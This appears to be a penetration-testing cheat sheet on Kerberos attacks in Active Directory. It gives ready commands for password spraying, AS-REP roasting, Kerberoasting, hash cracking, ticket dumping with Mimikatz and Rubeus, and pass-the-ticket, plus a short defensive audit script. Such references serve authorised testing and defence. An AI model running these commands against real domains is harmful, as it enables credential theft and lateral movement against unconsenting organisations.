Kerberos Enumeration

Kerberos is the default authentication protocol in Active Directory. Understanding its enumeration is critical for identifying attack vectors like Kerberoasting, AS-REP roasting, and delegation attacks.

mermaid
flowchart LR
    A[Kerberos Enum] --> B[User Discovery]
    A --> C[SPN Discovery]
    A --> D[Delegation]
    B --> B1[Kerbrute]
    B --> B2[AS-REP Roast]
    C --> C1[Kerberoasting]
    C --> C2[Service Accounts]
    D --> D1[Unconstrained]
    D --> D2[Constrained]
    D --> D3[RBCD]
    style A fill:#00ff00,stroke:#000,color:#000
    style C1 fill:#a855f7,stroke:#000,color:#000
    style B2 fill:#a855f7,stroke:#000,color:#000

User Enumeration via Kerberos

Tip

Kerberos user enumeration doesn't require credentials and generates minimal logs compared to LDAP queries.

Kerbrute

bash
# User enumeration (no creds needed)
kerbrute userenum -d corp.local --dc DC_IP users.txt

# Username bruteforce
kerbrute bruteuser -d corp.local --dc DC_IP passwords.txt username

# Password spray
kerbrute passwordspray -d corp.local --dc DC_IP users.txt 'Summer2024!'

# Common usernames to try
Administrator, admin, guest
svc_*, srv_*, service_*
sql*, backup*, scan*
helpdesk, support, printer

Nmap Kerberos Scripts

bash
# Enumerate valid users
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='corp.local',userdb=users.txt DC_IP

# Kerberos info
nmap -p 88 --script krb5-enum-users DC_IP

AS-REP Roasting

Warning

Accounts with the DONT_REQ_PREAUTH flag set return an AS-REP whose encrypted part is derived from the user's password hash, so that material can be requested without credentials and cracked offline.

Finding AS-REP Roastable Users

bash
# LDAP query for DONT_REQ_PREAUTH
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" sAMAccountName

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket - no creds, enumerate from userlist
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -format hashcat -no-pass

# Impacket - with creds, find all vulnerable users
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request

Extracting AS-REP Hashes

bash
# GetNPUsers - request hashes
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request -format hashcat -outputfile asrep.txt

# Without credentials (need valid username list)
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -format hashcat -no-pass

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --asreproast output.txt

# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Cracking AS-REP Hashes

bash
# Hashcat - mode 18200
hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule

# John
john --wordlist=wordlist.txt asrep.txt

Kerberoasting

Finding Kerberoastable Users

bash
# LDAP - find users with SPNs
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# PowerView
Get-DomainUser -SPN | Select sAMAccountName,servicePrincipalName

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --kerberoasting output.txt

Extracting TGS Hashes

bash
# Impacket GetUserSPNs
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile tgs.txt

# Request specific SPN
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request-user sqlservice

# Rubeus
.\Rubeus.exe kerberoast /outfile:tgs.txt

# Rubeus - target specific user
.\Rubeus.exe kerberoast /user:sqlservice /outfile:tgs.txt

# Rubeus - use RC4 downgrade (more crackable)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:tgs.txt

Cracking TGS Hashes

bash
# Hashcat - mode 13100 (RC4) or 19700 (AES256)
hashcat -m 13100 tgs.txt wordlist.txt -r rules/best64.rule
hashcat -m 19700 tgs.txt wordlist.txt -r rules/best64.rule

# John
john --wordlist=wordlist.txt tgs.txt

Delegation Enumeration

Unconstrained Delegation

Warning

Hosts with unconstrained delegation cache the TGTs of every user that authenticates to them, which makes them high-value targets!

bash
# LDAP - TRUSTED_FOR_DELEGATION flag
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName

# PowerView
Get-DomainComputer -Unconstrained
Get-DomainUser -Unconstrained

# CrackMapExec
crackmapexec ldap DC_IP -u user -p pass --trusted-for-delegation

Constrained Delegation

bash
# LDAP - msDS-AllowedToDelegateTo
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(msDS-AllowedToDelegateTo=*)" \
  sAMAccountName msDS-AllowedToDelegateTo

# PowerView
Get-DomainComputer -TrustedToAuth
Get-DomainUser -TrustedToAuth

# List what services they can delegate to
Get-DomainComputer -TrustedToAuth | Select sAMAccountName,msDS-AllowedToDelegateTo

Resource-Based Constrained Delegation

bash
# LDAP - msDS-AllowedToActOnBehalfOfOtherIdentity
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
  -b "DC=corp,DC=local" "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)" sAMAccountName

# PowerView
Get-DomainComputer | Where-Object {$_."msDS-AllowedToActOnBehalfOfOtherIdentity"}

# Check RBCD configuration
Get-DomainComputer TARGET | Select -ExpandProperty msDS-AllowedToActOnBehalfOfOtherIdentity
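The LDAP filters in the AS-REP roasting, Kerberoasting and delegation sections above all reduce to attribute checks: matching rule 1.2.840.113556.1.4.803 is a bitwise AND against userAccountControl, and the other filters test whether an attribute is present. The following added audit script (not part of this page's tooling) reproduces those checks over constructed sample records, so a defender can run the same logic against an exported directory listing; the record values and account names are assumptions.

```python
# Audit directory records for the Kerberos exposures enumerated on this page.
# userAccountControl bits referenced by the page's LDAP filters:
DONT_REQ_PREAUTH = 0x400000       # 4194304: AS-REP roastable
TRUSTED_FOR_DELEGATION = 0x80000  # 524288: unconstrained delegation
ACCOUNTDISABLE = 0x2              # disabled accounts are skipped, as most tooling does

# Constructed sample records (not real directory data): the attributes an
# ldapsearch for the page's filters would return.
SAMPLE_RECORDS = [
    {"sAMAccountName": "svc_backup", "objectClass": "user",
     "userAccountControl": 4260352},  # NORMAL_ACCOUNT|DONT_EXPIRE_PASSWORD|DONT_REQ_PREAUTH
    {"sAMAccountName": "sqlservice", "objectClass": "user", "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "WEB01$", "objectClass": "computer",
     "userAccountControl": 528384},  # WORKSTATION_TRUST_ACCOUNT|TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "APP02$", "objectClass": "computer", "userAccountControl": 4096,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.local"]},
    {"sAMAccountName": "FS01$", "objectClass": "computer", "userAccountControl": 4096,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # truncated placeholder SD
    {"sAMAccountName": "old_svc", "objectClass": "user",
     "userAccountControl": 4260354},  # same as svc_backup but ACCOUNTDISABLE set
]

def audit_record(rec):
    """Return the findings for one record, mirroring the page's LDAP filters."""
    uac = int(rec.get("userAccountControl", 0))
    findings = []
    if uac & ACCOUNTDISABLE:
        return findings
    if uac & DONT_REQ_PREAUTH:                      # (userAccountControl:1.2.840.113556.1.4.803:=4194304)
        findings.append("AS-REP roastable (DONT_REQ_PREAUTH)")
    # Computer accounts always carry SPNs; only user objects with SPNs are Kerberoastable
    if rec.get("objectClass") == "user" and rec.get("servicePrincipalName"):
        findings.append("Kerberoastable (user with SPN)")
    if uac & TRUSTED_FOR_DELEGATION:                # (userAccountControl:1.2.840.113556.1.4.803:=524288)
        findings.append("unconstrained delegation (TRUSTED_FOR_DELEGATION)")
    if rec.get("msDS-AllowedToDelegateTo"):         # (msDS-AllowedToDelegateTo=*)
        findings.append("constrained delegation to " + ", ".join(rec["msDS-AllowedToDelegateTo"]))
    if rec.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):  # (msDS-AllowedToActOnBehalfOfOtherIdentity=*)
        findings.append("RBCD configured (msDS-AllowedToActOnBehalfOfOtherIdentity set)")
    return findings

def audit(records):
    """Map sAMAccountName -> findings, omitting accounts with none."""
    return {r["sAMAccountName"]: f for r in records if (f := audit_record(r))}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_RECORDS).items():
        print(f"{name}: {'; '.join(findings)}")
```

Feeding it a real export means converting the ldapsearch output into the same dict shape; the bit tests and attribute-presence tests are unchanged.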

Ticket Operations

Extracting Tickets

bash
# Rubeus - list all tickets
.\Rubeus.exe triage

# Rubeus - dump tickets
.\Rubeus.exe dump

# Mimikatz - export tickets
sekurlsa::tickets /export

# Impacket - request TGT
getTGT.py corp.local/user:password -dc-ip DC_IP

# Impacket - request service ticket
getST.py corp.local/user:password -dc-ip DC_IP -spn cifs/target.corp.local

Using Tickets

bash
# Rubeus - Pass the Ticket
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Mimikatz - Pass the Ticket
kerberos::ptt ticket.kirbi

# Impacket - Use ccache
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass corp.local/user@target.corp.local

# Convert between formats
ticketConverter.py ticket.kirbi ticket.ccache

Comprehensive Tool Commands

Rubeus Full Enumeration

bash
# Current user's tickets
.\Rubeus.exe triage

# Kerberoast all users
.\Rubeus.exe kerberoast

# AS-REP roast
.\Rubeus.exe asreproast

# Harvest tickets continuously
.\Rubeus.exe harvest /interval:30

# Monitor for 4624 logons
.\Rubeus.exe monitor /interval:30 /targetuser:Administrator

Impacket Suite

bash
# Full Kerberoasting
GetUserSPNs.py -dc-ip DC_IP corp.local/user:password -request

# AS-REP Roasting
GetNPUsers.py -dc-ip DC_IP corp.local/user:password -request

# Request TGT for user
getTGT.py corp.local/user:password -dc-ip DC_IP

# Request service ticket
getST.py corp.local/user:password -dc-ip DC_IP -spn cifs/target -impersonate Administrator

# Convert ticket formats
ticketConverter.py ticket.kirbi ticket.ccache